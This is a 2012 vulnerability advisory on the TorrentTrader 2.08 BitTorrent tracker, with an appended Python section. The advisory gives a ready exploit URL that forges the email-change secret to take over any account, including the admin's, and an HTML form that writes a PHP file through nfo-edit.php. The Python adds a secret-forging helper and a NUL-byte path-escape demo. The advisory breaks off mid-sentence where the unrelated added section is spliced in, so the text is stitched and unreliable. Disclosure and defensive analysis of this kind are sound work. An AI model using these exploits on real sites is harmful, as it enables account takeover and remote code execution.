TorrentTrader 2.08 XSS / Directory Traversal / Bypass
Posted on 17 September 2012
[waraxe-2012-SA#089] - Multiple Vulnerabilities in TorrentTrader 2.08
===============================================================================

Author: Janek Vind "waraxe"
Date: 17. September 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-89.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TorrentTrader is a feature-packed and highly customisable PHP/MySQL based
BitTorrent tracker, featuring integrated forums and plenty of administration
options.

http://sourceforge.net/projects/torrenttrader/
http://www.torrenttrader.org/topic/14292-torrenttrader-v208-released/

###############################################################################
1. Unauthorized Email Change in "account-ce.php"
###############################################################################

Reason: authorization bypass
Attack vector: user submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's

-----------------[ source code start ]---------------------------------

$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
..
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes'
    AND `status` = 'confirmed' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
..
$sec = $row["editsecret"];
if ($md5 != md5($sec . $email . $sec))
    show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)."
    WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));

-----------------[ source code end ]-----------------------------------

The check only protects anything if "editsecret" is unpredictable. For an
account with no pending email change it is an empty string (the UPDATE above
resets it to '' after every change), so the expected value collapses to
md5($email), which the attacker can compute for any email address they choose.
Nothing but the target's numeric user ID is required.

Tests:

Let's find the md5 hash of the email "test@test.com", which is
"b642b4217b34b1e8d3bd915fc65c4452". Target user ID is 1.
We issue the GET request:

http://localhost/torrenttrader208/account-ce.php?id=1&secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com

A quick look at the database confirms that the email address of the user with
ID 1 has indeed been changed. The attacker's next logical move is a password
recovery request:

http://localhost/torrenttrader208/account-recover.php

After taking over the admin account the attacker is able to use the next
vulnerability, described below, which may allow PHP remote code execution.

###############################################################################
2. Arbitrary file creation / directory traversal in "nfo-edit.php"
###############################################################################

Reason: failure to properly sanitize user submitted data
Attack vector: user submitted POST parameters "id" and "content"
Preconditions:
  1. nfo-file editing privileges needed (usually admin)
  2. PHP must be < 5.3.4 for null-byte attacks to work
Result:
  1. attacker is able to write remote files with arbitrary content
  2. directory traversal vulnerability allows bypassing path restrictions

-----------------[ source code start ]---------------------------------

$id = (int)$_GET["id"]?$_GET["id"]:$_POST["id"];
$do = $_POST["do"];
$nfo = $site_config["nfo_dir"] . "/$id.nfo";
if ($do == "update") {
    if (file_put_contents($nfo, $_POST["content"])) {
        write_log("NFO ($id) was updated by $CURUSER[username].");

-----------------[ source code end ]-----------------------------------

Note that the (int) cast binds tighter than the ?: operator, so it is applied
only to the truth test. Whichever of $_GET["id"] or $_POST["id"] is selected
reaches the path string uncast and unsanitized; when no GET "id" is sent the
raw POST "id" is used as-is.

Test: first we need an HTML form like the one below:

<html><body><center>
<form action="http://localhost/torrenttrader208/nfo-edit.php" method="post"
      enctype="multipart/form-data">
<input type="hidden" name="do" value="update">
<input type="hidden" name="id" value="test.php">
<input type="hidden" name="content" value="<?php phpinfo();?>">
<input type="submit" value="Test">
</form></center></body></html>

Log in as admin and then make the POST request by clicking the "Test" button.
We should see "NFO Updated" as the response and can confirm that the new file
exists:

http://localhost/torrenttrader208/uploads/test.php.nfo

By using null byte ("
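Added example, not code from the waraxe advisory or from TorrentTrader: a Python model of the two checks quoted in sections 1 and 2, each placed beside a hardened form, so the bypass conditions can be exercised offline. PHP semantics are simplified (plain string equality for `!=`, leading-digit parsing for `(int)`), the hardened functions are an assumed fix rather than the project's own patch, and the directory "/var/www/uploads" and all function names are ours.

```python
# Added example (not from the advisory or TorrentTrader): models of the
# account-ce.php secret check and the nfo-edit.php path construction,
# each next to an assumed hardened version. PHP semantics simplified.
import hashlib
import hmac
import posixpath
import re

# --- 1. account-ce.php: if ($md5 != md5($sec . $email . $sec)) -----------

def expected_secret(editsecret: str, email: str) -> str:
    """md5($sec . $email . $sec) exactly as the PHP computes it."""
    return hashlib.md5((editsecret + email + editsecret).encode()).hexdigest()

def check_secret_vulnerable(editsecret: str, email: str, supplied: str) -> bool:
    """Accepts whenever supplied == md5(sec + email + sec). With no pending
    change editsecret is '', so the target collapses to md5(email)."""
    return supplied == expected_secret(editsecret, email)

def check_secret_fixed(editsecret: str, email: str, supplied: str) -> bool:
    """Assumed hardening (ours, not the project's patch): refuse accounts
    with no pending change and compare in constant time."""
    if not editsecret:
        return False
    return hmac.compare_digest(supplied, expected_secret(editsecret, email))

def forge_secret(email: str) -> str:
    """The ?secret= value an attacker sends when the target's editsecret
    is empty: just md5 of the email address they want to set."""
    return hashlib.md5(email.encode()).hexdigest()

# --- 2. nfo-edit.php: $id = (int)$_GET["id"]?$_GET["id"]:$_POST["id"]; ---

def php_intval(value):
    """Rough model of PHP's (int) cast on a string: leading digits, else 0."""
    if value is None:
        return 0
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0

def select_id_like_php(get_id, post_id):
    """The cast binds tighter than ?:, so it only picks the branch; the
    raw, uncast string is what ends up in the path."""
    return get_id if php_intval(get_id) else post_id

def nfo_path_vulnerable(nfo_dir: str, nfo_id: str) -> str:
    """Mirrors $site_config["nfo_dir"] . "/$id.nfo" with no validation."""
    return nfo_dir + "/" + nfo_id + ".nfo"

def effective_path_pre_534(path: str) -> str:
    """What the filesystem call saw on PHP < 5.3.4 (the advisory's version
    precondition): a NUL byte in the filename truncated it."""
    return path.split("\0", 1)[0]

def nfo_path_fixed(nfo_dir: str, nfo_id: str) -> str:
    """Assumed hardening: require a decimal id (rejects '../', NUL bytes,
    'test.php') and confirm the result still lives directly in nfo_dir."""
    if not re.fullmatch(r"[0-9]+", nfo_id):
        raise ValueError("id must be a decimal integer")
    path = posixpath.normpath(posixpath.join(nfo_dir, nfo_id + ".nfo"))
    if posixpath.dirname(path) != posixpath.normpath(nfo_dir):
        raise ValueError("path escapes nfo_dir")
    return path

def fixed_rejects(nfo_dir: str, nfo_id: str) -> bool:
    """True when the hardened path builder refuses the given id."""
    try:
        nfo_path_fixed(nfo_dir, nfo_id)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    email = "test@test.com"
    print("forged secret:", forge_secret(email))
    print("vulnerable check passes:", check_secret_vulnerable("", email, forge_secret(email)))
    print("fixed check passes:", check_secret_fixed("", email, forge_secret(email)))
    escaped = nfo_path_vulnerable("/var/www/uploads", "../test.php\0")
    print("path written on PHP < 5.3.4:", effective_path_pre_534(escaped))
```

The first half shows why "Preconditions: none" holds: the forged secret for user 1 is nothing more than md5 of the attacker's chosen email. The second half shows both halves of issue 2 at once: the misplaced cast leaves the POST "id" untouched, and on the affected PHP versions a trailing NUL drops the ".nfo" suffix so the written file keeps the attacker's extension.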